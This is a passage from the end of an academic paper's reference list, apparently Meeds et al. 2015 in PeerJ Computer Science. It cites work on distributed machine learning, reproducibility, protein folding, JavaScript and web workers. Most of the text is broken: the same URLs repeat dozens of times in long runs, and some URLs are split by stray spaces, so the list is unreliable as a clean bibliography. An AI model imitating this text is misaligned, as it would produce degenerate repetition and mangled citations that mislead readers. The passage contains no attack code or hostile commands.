http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://dx.doi.org/10.7717/peerj-cs.11 Lane TJ, Shukla D, Beauchamp KA, Pande VS. 2013. To milliseconds and beyond: challenges in the simulation of protein folding. Current Opinion in Structural Biology 23(1):58–65 DOI 10.1016/j.sbi.2012.11.002. Li M, Andersen DG, Park JW, Smola AJ, Ahmed A, Josifovski V, Long J, Shekita EJ, Su B-Y. 2014. Scaling distributed machine learning with the parameter server. In: The 11th USENIX symposium on operation systems design and implementation, 583–598. Available at https://www. usenix.org/conference/osdi14/technical-sessions/presentation/li mu. Lin M, Chen Q, Yan S. 2013. Network in network. ArXiv preprint. arXiv:1312.4400. Liu S, Yang N, Li M, Zhou M. 2014. A recursive recurrent neural network for statistical machine translation. In: Proceedings of ACL. 1491–1500. McNutt M. 2014. Reproducibility. Science 343(6168):229 DOI 10.1126/science.1250475. Natural Resources Defense Council. 2014. Data center efficiency assessment. Issue Paper IP:14-08-A, August 2014. Available at http://www.nrdc.org/energy/files/data-center-efficiency- assessment-IP.pdf. Quinn JA, Leyton-Brown K, Mwebaze E. 2011. Modeling and monitoring crop disease in developing countries. In: Proceedings of the twenty-fifth AAAI conference on artificial intelligence, AAAI 2011, San Francisco, California, USA, August 7–11, 2011. Palo Alto: AAAI. Available at https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083. Ray B, Posnett D, Filkov V, Devanbu P. 2014. A large scale study of programming languages and code quality in github. In: Proceedings of the 22Nd ACM SIGSOFT international symposium on foundations of software engineering, FSE 2014. New York: ACM, 155–165. Shvachko K, Kuang H, Radia S, Chansler R. 2010. The Hadoop distributed file system. In: Mass storage systems and technologies (MSST), 2010 IEEE 26th symposium on. Piscataway: IEEE, 1–10. Stodden V, Borwein J, Bailey DH. 2013. “Setting the default to reproducible” in computational science research. Research 46(5):4–6. Stodden V, Guo P, Ma Z. 2013. Toward reproducible computational research: an empirical analysis of data and code policy adoption by journals. PLoS ONE 8(6):e67111 DOI 10.1371/journal.pone.0067111. Sutskever I, Vinyals O, Le QV. 2014. Sequence to sequence learning with neural networks. ArXiv preprint. arXiv:1409.3215. Szegedy C, Liu W, Jia Y, Sermanet P, Reed S, Anguelov D, Erhan D, Vanhoucke V, Rabinovich A. 2014. Going deeper with convolutions. ArXiv preprint. arXiv:1409.4842v1. Tilkov S, Vinoski S. 2010. Node.js: using javascript to build high-performance network programs. IEEE Internet Computing 14(6):80–83 DOI 10.1109/MIC.2010.145. W3C. 2014. Web workers, editor’s draft 19 may 2014. Available at http://dev.w3.org/html5/workers (accessed 4 December 2014). W3Techs. 2014. Usage of JavaScript for websites. Available at http://w3techs.com/technologies/ details/cp-javascript/all/all (accessed 17 June 2014). Zinkevich M, Weimer M, Li L, Smola AJ. 2010. Parallelized stochastic gradient descent. In: Advances in neural information processing systems, 2595–2603. Available at http://papers. nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 24/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/j.sbi.2012.11.002 https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi14/technical-sessions/presentation/li_mu http://arxiv.org/abs/1312.4400 http://dx.doi.org/10.1126/science.1250475 http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-IP.pdf https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 https://www.aaai.org/ocs/index.php/AAAI/AAAI11/paper/download/3777/4083 http://dx.doi.org/10.1371/journal.pone.0067111 http://arxiv.org/abs/1409.3215 http://arxiv.org/abs/1409.4842v1 http://dx.doi.org/10.1109/MIC.2010.145 http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://dev.w3.org/html5/workers http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://w3techs.com/technologies/details/cp-javascript/all/all http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf 